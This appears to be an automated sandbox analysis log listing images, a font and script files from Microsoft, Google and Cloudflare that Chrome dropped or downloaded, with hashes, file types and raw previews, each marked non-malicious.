                                                                                        SHA-512:E0564E4A1382E19FF2ADBB09F6CDEDDF02BAA4307A05A86A38A32CF644181DB44325BC787FB3C0022583DFCDEFB9744E40448BCF771CDA4D79AB163C1C0FB5D2
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-edu-3-mreb-575eb26cf2.png
                                                                                        Preview:.PNG........IHDR..............'.V....pHYs.................sRGB.........gAMA......a...tLIDATx.....$.y..>q.uvu..@.q.......4").+J"e[.Mi...d.f<.S.=;.4....3.l..xe.sH.a.c[.F.). @...........3.}./2...2....`.|.d"3.../..;...... .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. .. ..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2609 x 470, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):713010
                                                                                        Entropy (8bit):7.987989282294461
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:U/c+B7hHsXoxmtGQolRbB//k45VaX4P1g+7TX9r4FYyPxquW5:UFhOoeGQwRbB08E4P1gqN4FfP4uW5
                                                                                        MD5:FA4FE5B56D9FAB46DB542559A3B83E37
                                                                                        SHA1:87921556BC7E350DEF09A7CBC51465C52383428D
                                                                                        SHA-256:9872BD2450803A2A52E862DE35CA6FA5F1684AC59174F73C7F80EADFC0B63002
                                                                                        SHA-512:8E58F7075D015C0280DCF0845A4FD84498E738EA57232E56A152336B611E2681EFB19C5824A31203E84B92E0355AFBE2447AD3CF76AABA1B3DA431471DB4D8D4
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...1.........<.9.....pHYs.................sRGB.........gAMA......a.....IDATx..O.uGr.Vu(K.lS$1..b.0.. ."..."..|.d.u..*..,.d1...o...0...I...XY.Z.0....Hp..-K...._W...>............}...[.t..._....bfBdp.e..G)-.z...jT....v.62.rxo/.Z.U...t....6~.>.x..<.8.....-.....+.{.3.7..6..g.....4.....Z..;...Y..X/..yC...4....}..Jn.".ej.W<Sn#.3.......o.K.?/.d.C)_.....'...,.P.P.8o.f.+.?....Mu`..u.y.1..A..d..$y;a|b.Ve.....,oWr.....{....\.U.2.j..4=...?c^.Z......z)....${M>+Yb^.Y.r....0...8N.../[.7.x#.{....+..<...yQF..i.s...._E.JV.a..wY..T.6n>N..-l...=..G^.g.=.Om.r..B=.|.y.[..[.........u...~...g........._...Ch.;..m#..<.)._..................i..u.......).....=..Lk.v.....N..._.U...._.f..r........_.................L.7N...........v.........?...z..U.....;..........?.G.HnW.W.oy~...o.9..g..g......]..........G..o..V......o..F.}..Q........._}..~...v.g*....'.|b.y....M.6m.i.M.6m..{$..tj..>.L?..S.c..w..~../..B?...TF.:..>...'?.....-|.=.M......?my.{.=Y.....w.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1037 x 807, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):454211
                                                                                        Entropy (8bit):7.990991479839813
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:2YIEcwyZJePwC+T+nOpGqxWwuoyTvtkz124TdyKd:5TqDBBAUEY1HHd
                                                                                        MD5:40F76B47F614919A109A3E36E611B55F
                                                                                        SHA1:161E1B199DA787D63485E2C0D0B2EAFCAF0A60E8
                                                                                        SHA-256:0577A7A47D06A9385C6BF2A52E5B5646B73B2A331B31F016EEADC7308370F753
                                                                                        SHA-512:98F92FAF568AA1F03B8DDD4493DA52E8B095FA3AB518F0B6A606CD423A12D8AB51AA9453211CF10844787A1BFC146E3485A1CF940FB7D73C63B71CC2130B79C5
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-commercial-3-mreb-40f76b47f6.png
                                                                                        Preview:.PNG........IHDR.......'.....U.3....pHYs.........&.:4....sRGB.........gAMA......a.....IDATx.....$.u......u.k;.=..0.o...h."..Q\R|Z..R.....{.....Oz..J+i..OK.2.$..H..a......7......[.*.s"#+23..n.@"....[...ddVu..9q.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[...........V.U......APZ.k....G.d.0..6.Agc8(v..Zg......g.x:."...............;.N4........}.k7..q.......|.Z./....`6.E.....E.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 216 x 46, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):4565
                                                                                        Entropy (8bit):7.879534543139402
                                                                                        Encrypted:false
                                                                                        SSDEEP:96:aSNKFuwJEQpaGX5wC3wglX5YEGdqsR1VsIAufA0E3xnMMV7:aSN3QpayvmEGdqsxsW7EhMMF
                                                                                        MD5:D596565EC1F100A507CC0D5F663B6D57
                                                                                        SHA1:6B688AA0541E5758B9A54C1848C6A52886E081BA
                                                                                        SHA-256:4C8A06620DD3AADE66AEB759A5FC2BCEC1B51B66EA9C456B5DC3F511CB783258
                                                                                        SHA-512:7E7CAF2644B686064959389EA975BC1701C8FB3FB23C44B701FE710227FE2A0A0B58769AABA6569FCBE1D79E44E5669CD60036060B3144E0C6B97A8C40D6CA9B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR.............J.......pHYs.................IDATx...t..u...H.$~X.....|L16.8@........`p.&.,..+.mPKh....4)$$.H..+Y....?SB.l.1..H!.4....c+..-k...cf.....Z.bZ......f..w.}.=.}...*...o....G.t%.?C...SOV.n..r!.t.<<.?.)..G......x...QA<... ..yxT..@w...Jkk..t:=....8....a.w..t)ux.v.......3TU}...........4.Z..@D.\...O.......<....\J).<......u.$..^.!.rfV.y},.[....a.....Q+..d...i...9..=..iU..S"ZY$[...&..1......9r"..........O.R..h..n..B...*X2..OD.,..n.4..]..k<.{..K..)...J.oB)...<.}>..6.o.~..X!.W..3s..,.<.Rj;DDg..........B\....;`..N...=1....L&.2...X,.z&m.)X1|.|9.`B.K`..K...u.K)7.o...CQ.9.|.C<....b......DD..] .\b....@0...d..s..X....0.S...2uuu.&..C.......O=..O..4-..+..ttt.+WV3......L......f.\..\......dr!.....[o.u_SSS...a.a..B....?.n.8.O.f.N...+....c}2O....p8.www..)b....D.........s4..~z..!.tQ...\........2{3X.o........OK$.'..}.M.f.8..c..DT....Kl.);\.=.;::d.2.v..RN.p..Bef.(.G.tz{<..QJ[.....1W.X1Y.1.....]......<....H.0&..~..y..(.E".wK..........G2.".L..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2500 x 828, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):1568713
                                                                                        Entropy (8bit):7.994353727710284
                                                                                        Encrypted:true
                                                                                        SSDEEP:24576:+SlEJttUZ+N7R8NrWZaF2sTAHPapdyjLLb7pFhO0+juu1nwdYAfnJ:+Qw8IcrSawsTMjLTpPj
                                                                                        MD5:7BF078A5F39C15673178E3C77EBDFBCE
                                                                                        SHA1:3FEAC213FCA05D4811FA705C60D726F5DC81B06D
                                                                                        SHA-256:7C5FBD491C8E2916ACDB0955EC27F21E6C933860B33626FD1DED5486816BDD35
                                                                                        SHA-512:CD621836F8420630E1A1A1B0F5BACDBFACB6C3FAC6CD9F93CF0500C5F3C05B8485C7CF0AF9CCE3F5025399FCC718EB0C8318C4E28174742D920D50022490FECE
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR.......<.....s.1.....pHYs.................sRGB.........gAMA......a....^IDATx...Y.%Iz....1.i...s........@.8..}(RF3]Qf}...f4.Q...?A7.L...tA...e..%..I:.....Q...Du.9.yXcD....=.#..U...Px...k..<<<<<v.....B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B.!..B
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):61
                                                                                        Entropy (8bit):3.990210155325004
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                                        MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                                        SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                                        SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                                        SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                                        Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 2501 x 831, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):871456
                                                                                        Entropy (8bit):7.99321885800314
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:0gKYAG/kgSHCI1lCaBDevD+ht1s996/cZoCCejkEnK3eXJdcKyMn5A+dZLw:rQR/1l9evDGdEZRzgAJdB/DdZE
                                                                                        MD5:46B510EC8A77F53E8C201F8779D69E42
                                                                                        SHA1:A21718B5BA16FF1BC10C43FFE9F4823D5EB414B0
                                                                                        SHA-256:D7315CEF7F382EB88B09A82EB3D5F13564105D5CE8413888963699E4BB523895
                                                                                        SHA-512:17E5C09882E8700C731AFE807F98D30658058CB9AC74A60CD291C37F0242863A2FB524829D708867529A368463D5949097D25DA5C6E6CF87DE0F9B125CA614AC
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR.......?.......(.....pHYs.................sRGB.........gAMA......a...K.IDATx.......y..>..}.].n-.R.$.%K.,#K.e....6.6.m.a9....0..=}.i...9s.9}.....{`.6....h....j......ZJ.Rm......%3&#3.'.}oI6.H.._.w.\"##"#.'..<".......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:MS Windows icon resource - 1 icon, 16x16, 32 bits/pixel
                                                                                        Category:downloaded
                                                                                        Size (bytes):1150
                                                                                        Entropy (8bit):2.6405445103388026
                                                                                        Encrypted:false
                                                                                        SSDEEP:6:a6nvQhIhIhIhIhIhIhIhIhIhIhIhIh6NQhIhIhIhIhIhIhIhIhIhIhIhIhIhIhIL:XvPN5ZNZX5hV
                                                                                        MD5:45E6383ED6764BCF66BB7CDA685BDEF8
                                                                                        SHA1:321AE49DC907E998D30E89BFE19B611CFEF2B222
                                                                                        SHA-256:9FEA566760E23830FB440B59122AFE4636A63E1997DBEAFC60A701BBE213B165
                                                                                        SHA-512:D1F29A7F13C231AFFD42DACA34E142AE225A50E97D173033F38E977F255B83C78B4AF30969474E59E269310D045DEB2712AA307D4E3301F04496BDD0CAD12B7A
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://ssl.gstatic.com/docs/drawings/images/favicon5.ico
                                                                                        Preview:............ .h.......(....... ..... .....@...................7D.7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D.7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D......................7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D......................7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D......................7D..7D..7D..7D..7D..7D..7D..P[..........7D......................7D..7D..7D..7D..7D..7D..v...............7D......................7D..7D..7D..7D..7D..7D..................7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..............................7D..7D..7D..7D..7D..7D..7D..7D..7D..............................7D..7D..7D..7D..7D..7D..7D..7D..7D..........................P[..7D..7D..7D..7D..7D..7D..7D..7D..7D..DP..................v...7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D..7D
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:Web Open Font Format (Version 2), TrueType, length 15344, version 1.0
                                                                                        Category:downloaded
                                                                                        Size (bytes):15344
                                                                                        Entropy (8bit):7.984625225844861
                                                                                        Encrypted:false
                                                                                        SSDEEP:384:ctE5KIuhGO+DSdXwye6i9Xm81v4vMHCbppV0pr3Ll9/w:cqrVO++tw/9CICFbQLlxw
                                                                                        MD5:5D4AEB4E5F5EF754E307D7FFAEF688BD
                                                                                        SHA1:06DB651CDF354C64A7383EA9C77024EF4FB4CEF8
                                                                                        SHA-256:3E253B66056519AA065B00A453BAC37AC5ED8F3E6FE7B542E93A9DCDCC11D0BC
                                                                                        SHA-512:7EB7C301DF79D35A6A521FAE9D3DCCC0A695D3480B4D34C7D262DD0C67ABEC8437ED40E2920625E98AAEAFBA1D908DEC69C3B07494EC7C29307DE49E91C2EF48
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://fonts.gstatic.com/s/roboto/v18/KFOmCnqEu92Fr1Mu4mxK.woff2
                                                                                        Preview:wOF2......;........H..;..........................d..@..J.`..L.T..<.....x.....^...x.6.$..6. ..t. ..I.h|.l....A....b6........(......@e.]...*:..-.0..r.)..hS..h...N.).D.........b.].......^..t?.m{...."84...9......c...?..r3o....}...S]....zbO.../z..{.....~cc....I...#.G.D....#*e.A..b...b`a5P.4........M....v4..fI#X.z,.,...=avy..F.a.\9.P|.[....r.Q@M.I.._.9..V..Q..]......[ {u..L@...]..K......]C....l$.Z.Z...Zs.4........ x.........F.?.7N..].|.wb\....Z{1L#..t....0.dM...$JV...{..oX...i....6.v.~......)|.TtAP&).KQ.]y........'...:.d..+..d..."C.h..p.2.M..e,.*UP..@.q..7..D.@...,......B.n. r&.......F!.....\...;R.?-.i...,7..cb../I...Eg...!X.)5.Aj7...Ok..l7.j.A@B`".}.w.m..R.9..T.X.X.d....S..`XI..1... .$C.H.,.\. ..A(.AZ.................`Wr.0]y..-..K.1.............1.tBs..n.0...9.F[b.3x...*$....T..PM.Z-.N.rS?I.<8eR'.3..27..?;..OLf*.Rj.@.o.W...........j~ATA....vX.N:.3dM.r.)Q.B...4i.f..K.l..s....e.U.2...k..a.GO.}..../.'..%$..ed.*.'..qP....M..j....../.z&.=...q<....-..?.A.%..K..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):97741
                                                                                        Entropy (8bit):5.317413225936828
                                                                                        Encrypted:false
                                                                                        SSDEEP:1536:yomI9/afvZtvdKJiT315bQNrkSGQSv921rl1:aI9CfPciD158NrkO1
                                                                                        MD5:C57CC11A511063B808F4A2C7745DF8D0
                                                                                        SHA1:CEB6E14B7520A995C7E9C3BB6F3C1DCD56CCB5EE
                                                                                        SHA-256:65628140B0930C3F9ED1A06A8F30F454245A08665047C6A95B592DFD164F4E9F
                                                                                        SHA-512:CA8C7FCB456D3819FBA65A5040547D5A169FC5BDA9F1EA8479EA75C0580A57D02DC07525445F9FA7EC0D09CF2F38A6B8F71F297F715A0059AB8786D5D85BF948
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:(()=>{"use strict";var e={},n={};function t(r){var i=n[r];if(void 0!==i)return i.exports;var o=n[r]={id:r,loaded:!1,exports:{}};return e[r](o,o.exports,t),o.loaded=!0,o.exports}t.m=e,(()=>{var e,n=Object.getPrototypeOf?e=>Object.getPrototypeOf(e):e=>e.__proto__;t.t=function(r,i){if(1&i&&(r=this(r)),8&i)return r;if("object"==typeof r&&r){if(4&i&&r.__esModule)return r;if(16&i&&"function"==typeof r.then)return r}var o=Object.create(null);t.r(o);var a={};e=e||[null,n({}),n([]),n(n)];for(var u=2&i&&r;"object"==typeof u&&!~e.indexOf(u);u=n(u))Object.getOwnPropertyNames(u).forEach((e=>a[e]=()=>r[e]));return a.default=()=>r,t.d(o,a),o}})(),(()=>{t.d=(e,n)=>{for(var r in n)t.o(n,r)&&!t.o(e,r)&&Object.defineProperty(e,r,{enumerable:!0,get:n[r]})}})(),(()=>{t.f={},t.e=e=>Promise.all(Object.keys(t.f).reduce(((n,r)=>(t.f[r](e,n),n)),[]))})(),(()=>{t.u=e=>"inline.text-encoder-lite.chunk.js"})(),(()=>{t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("retur
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:ASCII text, with very long lines (30221)
                                                                                        Category:dropped
                                                                                        Size (bytes):30273
                                                                                        Entropy (8bit):5.26135621409318
                                                                                        Encrypted:false
                                                                                        SSDEEP:768:42W2n0SMB/2ZsJIjrAWJdvgmfQFc6mjVqMP62A86uIz3yR:4XM0S0/ks2JdImYFcw662A86vzyR
                                                                                        MD5:9A3D03748259F75C7FCB9FF38217188B
                                                                                        SHA1:603E40F5EDF8A9F9776ABAF40608D8188F14AA43
                                                                                        SHA-256:85ED62025446CE50B8DB01DBE45485596DB9B9DB6A305BFA3E86AD8EA7305214
                                                                                        SHA-512:B2E7463DC490BB22FD4CAC06555B54DC844CD20B84B18618CA207689435B7FADA1E85BFABC725863E5E8FB4C1F7BD3EF082E7780DF1BAF1955759209E621284F
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:window.MSA=window.MSA||{};window.MSA.MeControl=window.MSA.MeControl||{};window.MSA.MeControl.Config={"ver":"10.24228.4","mkt":"en-US","ptn":"office","gfx":"https://amcdn.msftauth.net","dbg":false,"aad":true,"int":false,"pxy":true,"msTxt":false,"rwd":true,"telEvs":"PageAction, PageView, ContentUpdate, OutgoingRequest, ClientError, PartnerApiCall, TrackedScenario","instKey":"b8ffe739c47a401190627519795ca4d2-044a8309-9d4b-430b-9d47-6e87775cbab6-6888","oneDSUrl":"https://js.monitor.azure.com/scripts/c/ms.shared.analytics.mectrl-3.gbl.min.js","remAcc":true,"main":"meBoot","wrapperId":"uhf","cdnRegex":"^(?:https?:\\/\\/)?(mem\\.gfx\\.ms(?!\\.)|controls\\.account.microsoft?(?:-int|-dev)?(\\.com)?(:[0-9]{1,6})|amcdn\\.ms(?:ft)?auth\\.net(?!\\.))","timeoutMs":30000,"graphv2":false,"graphinfo":{"graphclientid":null,"graphscope":null,"graphcodeurl":null,"graphredirecturi":null,"graphphotourl":null},"aadUrl":"https://myaccount.microsoft.com","msaUrl":"https://account.microsoft.com/","authAppUpsell
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1699 x 1181, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):793073
                                                                                        Entropy (8bit):7.9926326015445595
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:zzR6wui4acRTYbntjQHv/6/nIz78wWDgqzMv0RxvAL+YopRvJl9JsG4VF5Rq5:zzRe+cRTY7+HKKASMRO+X3RJsGeg
                                                                                        MD5:979FF0DCE1EDA2035552AD1AA4EFACFA
                                                                                        SHA1:5765B464F4C94028C4D7492159E2B584DDE8E357
                                                                                        SHA-256:5979E07897CC0115AC1F320D880B419BF59185B8E6C7BCC75011784E90EA1FEF
                                                                                        SHA-512:623737D9A6493C87C6EE0765A8880AB3E1C1A67E674C3B4AA908049DE34CBC3D1A899BA1B6C644B881490453DD9067953F3AD00E5E335F872E5CB1AE30EEC244
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        Preview:.PNG........IHDR...............&.....pHYs.................sRGB.........gAMA......a.....IDATx...Y.ui~..k.............l..H....K.`.T...!..Yv.... .$... ... 7....A`...A,..e....bsR.U.Mg..Z+..<.w.]...Uu.2).......^k....L..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..c.1..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1017 x 706, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):372407
                                                                                        Entropy (8bit):7.9920868023509675
                                                                                        Encrypted:true
                                                                                        SSDEEP:6144:Qua8gWRQXRaGDBt/Qc8ABKmSzu/8YbOHPiyjcXLVzXDJImOdeEd0YufcqoTU3Xw1:QuaW0bL/QcdBaxjc7xXDOmOdee0DcqU/
                                                                                        MD5:1B4C66938347FF70F6D2FA1173D0C09B
                                                                                        SHA1:8766438A8E7EE0E068BABA0042B0D97C7667CAE4
                                                                                        SHA-256:B59D05AA36BA301347E8E8D711A42452E925F6875ACE1409B056AD2B759C9317
                                                                                        SHA-512:C9C2733F7C0DCA56B13E9F08CFFCFE0BD836F97D4D8B28EA1BA57896B9B2342A570D1653059BDED922024C10F8842C85504BAFD650CABA52C9DBF380078CBDF7
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-4-mreb-1b4c669383.png
                                                                                        Preview:.PNG........IHDR.....................pHYs.........&.:4....sRGB.........gAMA......a....LIDATx..[.m[r.V5.\..o.....O...>}w..6.` ..lC0.....F..@..(..<.C.).....!..)....<$J"E....D...0...M.}.n.....9*sT.WUs..6....Q...Zk.9..5... .4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I.&M.4i.I..^b.4.7.q....W........F.mL.~.G..Q..$.X...............,..q.w...W..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1034 x 719, 8-bit/color RGBA, non-interlaced
                                                                                        Category:downloaded
                                                                                        Size (bytes):449258
                                                                                        Entropy (8bit):7.987066102559051
                                                                                        Encrypted:false
                                                                                        SSDEEP:12288:d2GTMhzF8cPHvuBGMRBflaF7+smn+i0QuCPSSqjv:d2LZHPHWBrlaw5+HBCqNv
                                                                                        MD5:1858A1BEB780FEAFE4BBAC77F49ED237
                                                                                        SHA1:51B892F52A9A288E73578ADC6AA2C3E62C59A63B
                                                                                        SHA-256:C8119EE0CC14A582FB8BE25EE58C7DFA1D5D4DFE51C8665B03268196D2E5F0C7
                                                                                        SHA-512:5B2463CFCB7F5FAA4967739AF5D844BE569E22C1103BD7A1AC6DE5DEB42F0AC2E653404294DBE8CE65010E8DD1F4B846557AA16B022ACC4773981EDD754C518D
                                                                                        Malicious:false
                                                                                        Reputation:low
                                                                                        URL:https://res.cdn.office.net/officehub/images/content/images/unauth-refresh/highlight-consumer-2-mreb-1858a1beb7.png
                                                                                        Preview:.PNG........IHDR..............Q".....pHYs.........&.:4....sRGB.........gAMA......a.....IDATx...{.mIv....}...{.o.g.g.{f8.k.")r(.,F4ir..I.$G.L.!dG.%...r..!.8.$..8.......$H.......0lQ.dI.H.!..y.3.wwOw..;.*.j...s.E....5s.;g..kW..Z.[.Z.JdO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=.iO{.....=..M...iO{...D.....=[z......{.~>...il.g...,}.......9.>..)..L./.../\.....A...I..g...=.iO{.....?Vi'.......o...;.<y%..?..rG.x.{..\..\.ww.....;O.]...9...>...w...{........x|..xx.:].s8d....!..,Y.. 9...o.9'..Z..;9.JI.%....'...Z6..j.P........Z......-..Jm..aI.0Ni....._.WW.Z.....R{._/7..{k.Wz.u.P..n..lW)...........]Z.K.7g.w...X..<....I..
                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        File Type:PNG image data, 1119 x 704, 8-bit/color RGBA, non-interlaced
                                                                                        Category:dropped
                                                                                        Size (bytes):591728
                                                                                        Entropy (8bit):7.996032737804013
                                                                                        Encrypted:true
                                                                                        SSDEEP:12288:BzVysRpODYLFLYXMaM48blnrCrjueL1oETab46OxEdB7ny2Q7e/:rODoSMcImr71eUXEPnBQq/
                                                                                        MD5:8977DBD5387860CD8344B51DC4F00216
                                                                                        SHA1:A0BCA65DE5D325B87EBDED22EC2EE9F459EED2DB
                                                                                        SHA-256:6EA50E423008D71C95B019385D8A3D018DE4B9735870224B49EBA9B2E2A0263B
                                                                                        SHA-512:EAEC056E681DFAC5CDEFBA16A1AB20CBDBD736AC77D14F018FD6C371F2D6C1F81ED46353B7661BB2E326A89E608D5B2B9097A0AD0F7ADF4DEF682AE835D75B13
                                                                                        Malicious:false
                                                                                        Reputation:low
